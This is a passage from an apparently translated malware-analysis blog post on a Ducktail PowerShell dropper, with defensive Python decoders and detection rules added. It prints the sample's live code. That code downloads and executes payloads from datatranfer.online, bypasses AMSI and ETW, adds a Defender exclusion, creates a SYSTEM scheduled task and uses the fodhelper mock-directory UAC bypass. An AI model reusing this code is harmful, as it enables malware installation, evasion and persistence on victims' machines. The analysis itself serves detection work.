Remove-Job $job

OK, let's start by explaining the code section by section. With some experience of Ducktail, and many decoded PowerShell scripts behind us, we can see that the first file is a docx. This is not the threat itself but part of the "hook": the document the user will see on screen, along with some images, so that they do not realise that the phishing lure they downloaded is already in the post-exploitation phase XD

# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "http://datatranfer.online/file/docs/$fileName";

# Create a script block for the job
$scriptBlock = {
param (
[string]$filePath,
[string]$fileUrl
)

# Check if the file exists
if (-not (Test-Path -Path $filePath)) {
Write-Host "File does not exist. Downloading..."

# Download the file from the URL
Invoke-WebRequest -Uri $fileUrl -OutFile $filePath

Write-Host "Download complete."
}

# Open the file with the default program
Start-Process -FilePath $filePath
}

# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl

# Check if the job is running
if ($job.State -eq 'Running') {
Write-Host "Job is running. Job ID: $($job.Id)"
} else {
Write-Host "Job failed to start."
}

function Download-FileFromUrl {
param (
[string]$Url,
[string]$Destination
)

$count = 10;
while($count -gt 0)
{
try{
Invoke-WebRequest -URI $Url -OutFile $Destination;
Write-Host "Download success $Url";
break;
}
catch
{
Write-Host $_.Exception.Message;
Write-Host "Error download file $Url"
$count -= 1;
Start-Sleep -s 15;
}
}

Next comes a mutex. There is a lot of literature on mutexes, so I will limit myself to saying that it is part of the execution flow, so that you do not get lost in it; the important thing has to be read between the lines:

$isUACOpen = (Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).**EnableLUA**;
if($isUACOpen -eq 1)
{
$isUACOpen = (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System).**ConsentPromptBehaviorAdmin**;
}

The attacker is asking a "small favour" of our UAC: he does not want to be bothered when escalating to admin. EnableLUA says whether UAC is on at all, and ConsentPromptBehaviorAdmin says how administrators are prompted on elevation; as documented by Microsoft, a value of 0 in either means an elevation request will go through without showing a prompt.

The next part of the code, tied to that check, says: if our UAC is that exposed, just run the base64-encoded malicious code through -Verb runas, which will elevate without anyone noticing:

if($isUACOpen -eq 0)
{
Write-Host "ko can bypass uac";
Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 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");
exit;
}

Decoding this piece is subtly different. It is still base64, but -EncodedCommand expects UTF-16LE text, so we make a small change to our CC:

Decoding “EncodedCommand” Part of PowerShell execution

If we did not, the output would be full of strange characters (a NUL byte after every letter, since UTF-16 uses two bytes per character), which we would then have to remove with a replace in our favourite text editor. With this setting we skip that step ;)
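As an added example (analyst tooling written for this post, not code from the sample), here is the same decoding step in Python: it pulls every -EncodedCommand argument out of a script, decodes it as UTF-16LE the way PowerShell does, and shows what the naive ASCII decode looks like. PAGE_SAMPLE is the encoded command that appears in the sample's UAC-prompting branch; the second input is a constructed launcher line built here in the same shape.

```python
import base64
import re

# Added example, written for this post (not code from the sample): extract and
# decode -EncodedCommand arguments. PowerShell expects the base64 to wrap UTF-16LE
# text, so decoding it as ASCII leaves a NUL after every character, which is the
# "strange characters" problem described above. The regex also accepts the
# abbreviations -e/-ec/-enc that powershell.exe resolves to -EncodedCommand.
ENC_CMD_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)

# Copied from the sample above: the encoded command launched when UAC would prompt.
PAGE_SAMPLE = (
    "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA=="
)


def decode_encoded_command(b64):
    """Decode a -EncodedCommand value the way PowerShell does: base64 of UTF-16LE."""
    return base64.b64decode(b64).decode('utf-16-le')


def decode_as_ascii(b64):
    """The naive decode: every second byte is a NUL and shows up as a stray character."""
    return base64.b64decode(b64).decode('latin-1')


def encode_command(command):
    """Inverse operation, used here only to build a constructed test input."""
    return base64.b64encode(command.encode('utf-16-le')).decode('ascii')


def extract_encoded_commands(script):
    """Every decoded -EncodedCommand payload found in a script, in order."""
    return [decode_encoded_command(m.group(1)) for m in ENC_CMD_RE.finditer(script)]


# Constructed sample (not from the malware): a launcher line like the one in the
# script above, wrapping a command assembled here.
INNER_COMMAND = ('Start-Process "cmd.exe" -ArgumentList ("/c copy ""C:\\Windows\\System32\\fodhelper.exe"" '
                 '""C:\\Windows \\System32\\""") -WindowStyle Hidden -Wait;')
CONSTRUCTED_SCRIPT = (
    'Start-process "powershell.exe" -ArgumentList ("-EncodedCommand '
    + encode_command(INNER_COMMAND) + '") -WindowStyle Hidden -Wait;'
)

if __name__ == '__main__':
    print(decode_encoded_command(PAGE_SAMPLE))
    print(repr(decode_as_ascii(PAGE_SAMPLE)[:24]))   # the NUL-padded version
    for cmd in extract_encoded_commands(CONSTRUCTED_SCRIPT):
        print(cmd)
```

The first print gives the Start-Process / mkdir / copy fodhelper line discussed further down; the second shows why the wrong encoding looks like garbage ('S\x00t\x00a\x00r\x00t\x00...').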

And this is the resulting code:

$aywcxthibd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGEvcHMvOGMxZDFhMTUyMmUwMzcwNWNkMGJhNmVlMjBmNDdlM2M="));
$ttfob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cDovL2RhdGF0cmFuZmVyLm9ubGluZS9hcGkvZmlsZWRh"));
$uri = ($ttfob + $aywcxthibd);
$count = 10;
while($count -gt 0)
{

try{
$content = Invoke-WebRequest -Uri $uri -UseBasicParsing;
Invoke-Expression $content.content;
break;
}
catch
{
Write-Host $_.Exception.Message
$count -= 1;
Start-Sleep -s 15;
}
}

From the structure it already smells like a URL, and indeed it is: $ttfob + $aywcxthibd decodes to http://datatranfer.online/api/filedata/ps/8c1d1a1522e03705cd0ba6ee20f47e3c, another URL whose response is fetched (with up to ten retries) and passed straight to Invoke-Expression. Downloaded, it contains this:

$jfsbsnefd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("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"));
$lyulayuejj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Q1EwS1puVnVZM1JwYjI0Z1YyRnBkQzFQYmsxMWRHVjRJSHNOQ2lBZ0lDQndZWEpoYlNBb0RRb2dJQ0FnSUNBZ0lGdHdZWEpoYldWMFpYSW9UV0Z1WkdGMGIzSjVQU1IwY25WbEtWME5DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtUWFYwWlhoSlpBMEtJQ0FnSUNrTkNnMEtJQ0FnSUhSeWVTQjdEUW9nSUNBZ0lDQWdJQ1JOZFhSbGVFbHVjM1JoYm1ObElEMGdUbVYzTFU5aWFtVmpkQ0JUZVhOMFpXMHVWR2h5WldGa2FXNW5MazExZEdWNElDMUJjbWQxYldWdWRFeHBjM1FnSjJaaGJITmxKeXdnSkUxMWRHVjRTV1FOQ2lBZ0lDQWdJQ0FnZDJocGJHVWdLQzF1YjNRZ0pFMTFkR1Y0U1c1emRHRnVZMlV1VjJGcGRFOXVaU2d4TURBd0tTa2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ1UzUmhjblF0VTJ4bFpYQWdMVzBnTlRBd0RRb2dJQ0FnSUNBZ0lIME5DaUFnSUNBZ0lDQWdjbVYwZFhKdUlDUk5kWFJsZUVsdWMzUmhibU5sRFFvZ0lDQWdmU0JqWVhSamFDQmJVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NUJZbUZ1Wkc5dVpXUk5kWFJsZUVWNFkyVndkR2x2YmwwZ2V3MEtJQ0FnSUNBZ0lDQWtUWFYwWlhoSmJuTjBZVzVqWlNBOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NU5kWFJsZUNBdFFYSm5kVzFsYm5STWFYTjBJQ2RtWVd4elpTY3NJQ1JOZFhSbGVFbGtEUW9nSUNBZ0lDQWdJSEpsZEhWeWJpQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSkUxMWRHVjRTV1FOQ2lBZ0lDQjlEUXA5RFFwWGNtbDBaUzFJYjNOMElDSlhRWFJwYm1jaU93MEtKRTExZEdWNFNXNXpkR0Z1WTJVZ1BTQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSWxKVlRrNUpUa2NpT3cwS0RRcFhjbWwwWlMxSWIzTjBJQ0p5ZFc1dWFXNW5JanNOQ2cwS0RRb2pJRU5vWldOcklHbG1JRmRwYm1SdmQzTWdSR1ZtWlc1a1pYSWdhWE1nYVc1emRHRnNiR1ZrSUdGdVpDQmxibUZpYkdWa0RRb2tkMmx1Wkc5M2MwUmxabVZ1WkdWeUlEMGdSMlYwTFZkdGFVOWlhbVZqZENBdFRtRnRaWE53WVdObElDSlNiMjkwWEZObFkzVnlhWFI1UTJWdWRHVnlNaUlnTFVOc1lYTnpJQ0pCYm5ScGRtbHlkWE5RY205a2RXTjBJaUI4SUZkb1pYSmxMVTlpYW1WamRDQjdJQ1JmTG1ScGMzQnNZWGxPWVcxbElDMWw="));
$pcbmli=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("blB1YmxpYyxTdGF0aWM="));
$bokaabh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm8="));
$ukqyefbmi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXR3UHJvdmlkZXI="));
$qjmjs=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$piualxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlRyYWNpbmcuUFNFdHdMb2dQcm92aWRlcg=="));
$csgnlg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$pwckunaunc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsSW5zdGFuY2U="));
$cnabzidj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$qchnys=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("X2VuYWJsZWQ="));
$ahlqtwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bQ=="));
$anfmwtwcbi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y3MuRXZlbnRpbmcuRXZlbnRQcm92aWRlcg=="));
$dlfjuvi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aQ=="));
$zyamzl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLkNvcmU="));
$sbufr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$epxxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsU3RhdGlj"));
$mjlcobsv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$ygxmj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));
$pkthe=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));
$yyijbukto=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM="));
$dwlwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$mwceo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UnRabmw1ZEdkaVoyUnJZaUE5SUNSMGNuVmw="));
$hhhwloob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdkbmIy"));
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($hhhwloob + $mwceo))));
$ffbxdoueycxyauct = [Ref].Assembly.GetType(($dwlwa + $yyijbukto)).GetField(($pkthe + $ygxmj),($mjlcobsv + $epxxi));
$ffbxdoueycxyauct.SetValue($null,$ggodmfyytgbgdkb);
[Reflection.Assembly]::LoadWithPartialName(($sbufr + $zyamzl)).GetType(($dlfjuvi + $anfmwtwcbi)).GetField(($ahlqtwa + $qchnys),($cnabzidj + $pwckunaunc)).SetValue([Ref].Assembly.GetType(($csgnlg + $piualxi)).GetField(($qjmjs + $ukqyefbmi),($mjlcobsv + $epxxi)).GetValue($null),0);
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($lyulayuejj + $jfsbsnefd))));

In summary, we have a new payload plus the same fuss (the AMSI and ETW stub we already saw). Why change it if it works? In this case the decoded code is:

function Wait-OnMutex {
param (
[parameter(Mandatory=$true)]
[string]$MutexId
)
try {
$MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
while (-not $MutexInstance.WaitOne(1000)) {
Start-Sleep -m 500
}
return $MutexInstance
} catch [System.Threading.AbandonedMutexException] {
$MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
return Wait-OnMutex -MutexId $MutexId
}
}
Write-Host "WAting";
$MutexInstance = Wait-OnMutex -MutexId "RUNNING";
Write-Host "running";
# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
$isRunning = $true;
Add-MpPreference -ExclusionPath "C:\Windows\Temp";
} elseif ($otherAntivirus -ne $null) {

} else {
$isRunning = $true;
}

if($isRunning -eq $false) {
exit;
}
function Download-FileWithRetry {
param (
[string]$url,
[string]$destination,
[int]$maxRetries = 30,
[int]$retryDelayInSeconds = 5
)
$retryCount = 0
$downloadSucceeded = $false
while ($retryCount -lt $maxRetries -and -not $downloadSucceeded) {
try {
# Check if the destination file already exists
if (Test-Path -Path $destination -PathType Leaf) {

try{
Remove-Item -Path $destination;
}
catch{
Write-Host "File already exists at $destination. Download canceled.";
return;
}

}
# Use WebClient to download the file
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($url, $destination)
# Check if the download was successful
if (Test-Path -Path $destination -PathType Leaf) {
Write-Host "Download completed: $destination"
$downloadSucceeded = $true
} else {
Write-Host "Download failed: $url"
}
}
catch [System.Net.WebException] {
# Handle internet errors
Write-Host "Internet error: $($_.Exception.Message)"
}
catch {
# Handle other errors
Write-Host "Error: $($_.Exception.Message)"
}
# If the download failed, increment the retry count and wait before retrying
if (-not $downloadSucceeded) {
$retryCount++
if ($retryCount -lt $maxRetries) {
Write-Host "Retrying download in $retryDelayInSeconds seconds..."
Start-Sleep -Seconds $retryDelayInSeconds
}
}
}
if (-not $downloadSucceeded) {
Write-Host "Download failed after $maxRetries retries."
}
}
Write-Host "Sleep 10s";
Start-Sleep -Seconds 10;
Write-Host "Download bot";
Download-FileWithRetry -url "http://datatranfer.online/file/t/mainbot.exe" -destination "C:\Windows\Temp\svczHost.exe";
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\svczHost.exe" -Argument "chubedan datatranfer.online";
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper";
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";
Write-Host "ket thuc";
$MutexInstance.ReleaseMutex();

I will divide this analysis into two parts, as this component is mainly about defense evasion. First, a query of the WMI SecurityCenter2 namespace to find out which AV the company runs. If it is Defender, it is forced to load an exclusion for C:\Windows\Temp with "Add-MpPreference -ExclusionPath" (a cmdlet that needs administrative rights, which is why the whole thing was launched through -Verb runas in the previous step):

# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
$isRunning = $true;
**Add-MpPreference -ExclusionPath "C:\Windows\Temp";**

If it is another AV, then, as we say in Spanish, "you should have studied": the elseif branch is empty, $isRunning stays $false and the script simply exits. Jokes aside, many AVs store their exclusions in the Windows registry, but even if you modify that registry, the change disappears at the next policy update. I checked this years ago on a McAfee, so it may not apply equally to all of them. If you have more information on this, I will read you in the comments.

On the other hand, the code has a second important part. I comment on it inline with ###:

### Download of a very suspicious payload ###
Download-FileWithRetry -url "http://datatranfer.online/file/t/mainbot.exe" -destination "C:\Windows\Temp\svczHost.exe"; ### it is saved under a name very similar to the Windows binary "svchost.exe", which is central to many system operations. This is first-rate *masquerading*. ###

### Persistence through a scheduled task ###
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\svczHost.exe" -Argument "chubedan datatranfer.online";

### Of course, a scheduled task into which a privilege escalation is slipped: it runs as the most privileged account on the system, more than any "admin": SYSTEM ###
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;

### Strange name so as not to attract attention ###
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper"; ### But yes, the description looks like something harmless ###
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";
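The two behaviours above (a Defender exclusion added with Add-MpPreference, and a SYSTEM scheduled task pointing at a look-alike binary in a writable directory) are what I would key a script-block-logging detection on. The following Python is an added example written for this post, not part of the sample: it runs a few rules over constructed Event ID 4104 records (ScriptBlockText), two of which mirror the lines quoted above and two of which are benign controls. The SecurityCenter2 discovery, the exclusion, the SYSTEM task launched from C:\Windows\Temp and the svczHost.exe look-alike name are each flagged separately.

```python
import ntpath
import re

# Added example, written for this post (not from the sample or the author):
# detection logic for the actions above, run over constructed PowerShell
# script-block log records (Event ID 4104, ScriptBlockText). Records 1 and 2
# mirror the l*ines quoted from the sample; 3 and 4 are benign controls.
# Names and paths are made up for the test.

WRITABLE_DIRS = ('c:\\windows\\temp', 'c:\\users\\', 'c:\\programdata\\', '%temp%')
SYSTEM_BINARIES = ('svchost.exe', 'lsass.exe', 'csrss.exe', 'services.exe',
                   'winlogon.exe', 'explorer.exe', 'wininit.exe')
EXEC_RE = re.compile(r'-Execute\s+"([^"]+)"', re.IGNORECASE)
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"\']+\.(?:exe|dll)', re.IGNORECASE)
SYSTEM_PRINCIPAL_RE = re.compile(r'-userid\s+"?(?:nt authority\\)?system"?')


def edit_distance(a, b):
    """Levenshtein distance; one insertion turns svchost.exe into svczhost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_system_binary(path):
    """True for a file name one edit away from a core Windows binary, but not equal to it."""
    name = ntpath.basename(path).lower()
    if name in SYSTEM_BINARIES:
        return False
    return any(edit_distance(name, known) <= 1 for known in SYSTEM_BINARIES)


def classify_script_block(text):
    """Return the names of the rules one script block triggers."""
    rules = []
    low = text.lower()
    if 'securitycenter2' in low and 'antivirusproduct' in low:
        rules.append('av_discovery_wmi')
    if re.search(r'add-mppreference\s+-exclusion', low):
        rules.append('defender_exclusion_added')
    if 'register-scheduledtask' in low:
        as_system = bool(SYSTEM_PRINCIPAL_RE.search(low)) or '-runlevel highest' in low
        m = EXEC_RE.search(text)
        from_writable = bool(m) and m.group(1).lower().startswith(WRITABLE_DIRS)
        if as_system and from_writable:
            rules.append('system_task_from_writable_dir')
    for path in PATH_RE.findall(text):
        if looks_like_system_binary(path):
            rules.append('masquerading_binary_name:' + ntpath.basename(path))
            break
    return rules


def scan(events):
    """Map each record id to the rule names it triggers."""
    return {ev['RecordId']: classify_script_block(ev['ScriptBlockText']) for ev in events}


# Constructed 4104 records; 1 and 2 mirror the sample, 3 and 4 are benign.
SAMPLE_EVENTS = [
    {'RecordId': 1, 'ScriptBlockText':
        '$windowsDefender = Get-WmiObject -Namespace "Root\\SecurityCenter2" -Class "AntivirusProduct" '
        '| Where-Object { $_.displayName -eq "Windows Defender" }\n'
        'Add-MpPreference -ExclusionPath "C:\\Windows\\Temp";'},
    {'RecordId': 2, 'ScriptBlockText':
        '$action = New-ScheduledTaskAction -Execute "C:\\Windows\\Temp\\svczHost.exe" -Argument "chubedan datatranfer.online";\n'
        '$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;\n'
        'Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger '
        '-TaskName "zServicechubedan" -Description "Windows helper";'},
    {'RecordId': 3, 'ScriptBlockText':
        '$action = New-ScheduledTaskAction -Execute "C:\\Program Files\\Backup\\backup.exe";\n'
        'Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "NightlyBackup";'},
    {'RecordId': 4, 'ScriptBlockText': 'Get-ChildItem C:\\Windows\\Temp | Remove-Item -Force'},
]

if __name__ == '__main__':
    for record_id, hits in scan(SAMPLE_EVENTS).items():
        print(record_id, hits)
```

The scheduled-task rule deliberately needs both conditions (SYSTEM or highest run level, and an executable under a user-writable directory) so that an administrator's own task pointing into Program Files, like record 3, stays quiet.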

As we can see, this code is a real gem. Here is a VirusTotal collection on Ducktail where you can find a copy of "mainbot / svczHost", to take a look without having to download it. To continue with this part of the analysis, I will take that sample.

Without going into an extensive analysis, which would fill another whole post, I would like to show you a subtle detail that can be seen in the sandbox results:

Changing powershell.exe to pwsh.exe (the PowerShell Core host, version 6 and later) may seem trivial, but it is actually a significant change, becauuuuseee many hand-written detection rules key on the image name powershell.exe and would miss it, while the execution is exactly the same. That is why it is important to write the rules "well" when we implement a use case: not only for what we see, but for everything that can be run.

Returning to our analysis, let’s go to the next part of the code:

else
{
Write-Host "bypass uac run cmd";
Start-process "powershell.exe" -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden -Wait;

Here is the result, and I tell you, our attacker is old school, and not only because of this execution detail:

Start-Process "cmd.exe" -ArgumentList ("/c mkdir ""C:\Windows \"" & mkdir ""C:\Windows \System32\"" & copy ""C:\Windows\System32\**fodhelper.exe**"" ""C:**\Windows \**System32\""") -WindowStyle Hidden  -Wait;

Here we have two techniques. The first is a dirty one: the space after Windows in the copy destination, which means that folder is not "Windows" but "Windows " (with a trailing space). Do you see the difference? Another masquerade: it is not the Windows folder, but anyone who sees it will think it is.

It also copies fodhelper.exe into that folder. Copying binaries out of System32 to other locations, another classic.

Here is an explanation of why fodhelper is used. Look at the date, and you will understand why our attacker looks like an old-schooler.
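The trailing-space "Windows " directory above, and the earlier point that a rule keyed on powershell.exe alone misses pwsh.exe, both translate into process-creation checks. The following Python is an added example written for this post (not the sample's code, and not tied to any product's event schema): it normalises paths the way the Win32 parser does so the mock directory surfaces, flags fodhelper.exe running from anywhere but System32, and matches -EncodedCommand (and its -e/-ec/-enc abbreviations) on either PowerShell host. The five events are constructed here; events 1 and 5 mirror the commands shown above.

```python
import ntpath
import re

# Added example, written for this post (not from the sample or the author): checks a
# detection engineer would run over process-creation telemetry for the two points
# made above. Event records are constructed here; the Image/CommandLine/ParentImage
# field names are the usual shape but are not tied to a specific product.

PATH_RE = re.compile(r'[A-Za-z]:\\[^"\r\n]*')
# -EncodedCommand and the abbreviations powershell.exe / pwsh.exe accept for it
ENC_RE = re.compile(r'(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{8,}', re.IGNORECASE)
# both hosts: a rule keyed on "powershell.exe" alone misses pwsh.exe
POWERSHELL_IMAGES = ('powershell.exe', 'pwsh.exe', 'powershell_ise.exe')


def normalize_win_path(path):
    """Drop trailing spaces/dots from directory components, as the Win32 path parser
    does, so 'C:\\Windows \\System32' collapses to 'C:\\Windows\\System32'."""
    return re.sub(r'[ .]+(?=\\)', '', path)


def mock_directories(text):
    """Normalized form of every path in text whose raw spelling differs from it,
    i.e. a directory component carries a trailing space or dot (the 'Windows ' trick)."""
    hits = []
    for m in PATH_RE.finditer(text):
        raw = m.group(0)
        norm = normalize_win_path(raw)
        if norm.lower() != raw.lower():
            hits.append(norm)
    return hits


def classify_process_event(ev):
    """Rule names triggered by one process-creation record."""
    rules = []
    image = ev.get('Image', '')
    cmdline = ev.get('CommandLine', '')
    exe = ntpath.basename(image).lower()

    mocks = mock_directories(image + '\n' + cmdline)
    if mocks:
        rules.append('mock_trusted_directory:' + mocks[0])

    # fodhelper.exe is an auto-elevating binary; it only belongs in System32
    if exe == 'fodhelper.exe' and ntpath.dirname(image).lower() != r'c:\windows\system32':
        rules.append('fodhelper_outside_system32')

    if exe in POWERSHELL_IMAGES and ENC_RE.search(cmdline):
        rules.append('powershell_encoded_command')
    return rules


def scan(events):
    return {ev['Id']: classify_process_event(ev) for ev in events}


# Constructed events: 1 and 5 mirror the sample's commands, 2 and 4 are benign,
# 3 is the pwsh.exe variant seen in the sandbox.
SAMPLE_EVENTS = [
    {'Id': 1, 'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'Image': 'C:\\Windows \\System32\\fodhelper.exe',
     'CommandLine': '"C:\\Windows \\System32\\fodhelper.exe"'},
    {'Id': 2, 'ParentImage': 'C:\\Windows\\explorer.exe',
     'Image': 'C:\\Windows\\System32\\fodhelper.exe',
     'CommandLine': 'fodhelper.exe'},
    {'Id': 3, 'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'Image': 'C:\\Program Files\\PowerShell\\7\\pwsh.exe',
     # the base64 is UTF-16LE for: Write-Host "hi"
     'CommandLine': 'pwsh.exe -WindowStyle hidden -NoProfile -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACIAaABpACIA'},
    {'Id': 4, 'ParentImage': 'C:\\Windows\\explorer.exe',
     'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'CommandLine': 'powershell.exe -NoProfile -Command Get-Date'},
    {'Id': 5, 'ParentImage': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'Image': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'cmd.exe /c mkdir "C:\\Windows \\" & mkdir "C:\\Windows \\System32\\"'},
]

if __name__ == '__main__':
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Note that the fodhelper check compares the raw directory, not the normalised one: after normalisation the mock path reads exactly like the real System32, which is the whole point of the trick.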

The next piece of code is the "final" one, final for this post at least, and an "important" one: it downloads a DLL named propsys.dll next to the copied fodhelper.exe and launches that fodhelper.exe from the mock directory, retrying until the RUNNING mutex tells it the next stage is up:

while($true){
Write-Host "download file";
Download-FileFromUrl -Url "http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41" -Destination "C:\Windows \System32\propsys.dll";
